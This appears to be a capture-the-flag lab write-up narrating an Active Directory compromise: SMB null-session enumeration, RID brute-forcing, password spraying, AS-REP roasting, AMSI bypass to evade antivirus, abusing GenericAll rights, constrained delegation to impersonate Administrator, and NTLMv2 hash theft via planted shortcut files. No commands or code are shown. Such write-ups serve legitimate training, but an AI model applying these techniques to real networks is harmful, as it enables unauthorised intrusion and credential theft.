πReset
This challenge simulates a cyber-attack scenario where you must exploit an Active Directory environment.
Enumeration
IP
10.10.165.85We are working with a Windows AD domain controller
The first thing we can do is enumerate SMB shares with null authentication
We find a Data share with read and write permissions
In the first PDF we find a possible username and a default password
Since we can enumerate shares without valid creds we can try to RID brute to find usernames
Now we sort the userlist manually and remove groups and machine accounts from the list
Now spraying the default password we get a hit
This user does not have any interesting privileges
We can try to check for ASREP roastable accounts
We got three accounts that do not require kerberos preauthentication
But we only manage to get a cracked password
This user can RDP in the DC
AD enumeration
AV is enabled on the DC
Bloodhound-python failed because sometimes we need to create a fake DNS server to respond to the queries, but we can enumerate the AD from the DC itself
First of all we need to bypass AMSI and .NET AMSI to reflectively load C# code without touching disk and triggering AV, you will need to find the bypasses yourself, then we can run SharpHound and PowerView for manual enumeration
Now if we look at the Transitive Object controls for this user we can see that is has GenericAllon some users
We can change the password of all these users and get to DARLA_WINTERS that has constrained delegation enabled
Constrained delegation
Now we can request a ticket impersonating the Administrator
This could have been achieved also by using Rubeus on the DC and reflectively loading it in memory to evade AV
Different initial access path
Since we had Write privileges over the initial share we can upload a .lnk or a .url file and steal a NTLMv2 hash to enumerate the AD and proceed with the previous attack path
Last updated